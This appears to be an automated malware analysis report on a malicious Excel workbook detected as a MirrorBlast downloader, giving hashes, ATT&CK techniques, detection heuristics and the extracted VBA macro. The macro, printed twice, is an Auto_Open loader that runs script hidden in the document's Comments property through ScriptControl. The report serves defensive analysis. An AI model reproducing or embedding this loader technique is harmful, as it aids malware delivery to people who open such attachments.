Office (OLE) malware analysis — malicious · 86ea7a3f1a8418c2

MALICIOUS

Office (OLE)

65.5 KB Created: 2021-08-17 12:24:08 Authoring application: Microsoft Excel First seen: 2021-11-02

MD5: 0d7b2d491941b971c8e4e6a4ef740061 SHA-1: 6df177d7cd3f0225d2507ea5614eddf2fcb7358e SHA-256: 86ea7a3f1a8418c27a6ccab58b933c6ecc595dd271db81819defb0f49d452c6d

160 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The Excel file contains an Auto_Open VBA macro that leverages the ScriptControl object to execute code. The macro dynamically sets the script language based on the document's 'Subject' property and executes code embedded within the 'Comments' property. This is a common technique for downloading and executing further stages of malware, as indicated by the ClamAV detection for Xls.Downloader.MirrorBlast.

Heuristics 4

MSScriptControl.ScriptControl — CVE-2015-0097 high CVE likely CVE_2015_0097_SC

MSScriptControl.ScriptControl — CVE-2015-0097
ClamAV: Xls.Downloader.MirrorBlast-f8f807074fc98734-9955046-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.MirrorBlast-f8f807074fc98734-9955046-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 862 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	862 bytes
SHA-256: `0278d22c57457c6ea65486c5e13f4b06bae683e9ef9fa360c905d1932da96848`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" Function Auto_Open() Dim a As New ScriptControl a.Language = ActiveWorkbook.BuiltinDocumentProperties("Subject").Value a.AddCode (ActiveWorkbook.BuiltinDocumentProperties("Comments").Value) End Function

SHA-256: 0278d22c57457c6ea65486c5e13f4b06bae683e9ef9fa360c905d1932da96848

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Function Auto_Open()
    Dim a As New ScriptControl
    a.Language = ActiveWorkbook.BuiltinDocumentProperties("Subject").Value
    a.AddCode (ActiveWorkbook.BuiltinDocumentProperties("Comments").Value)
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.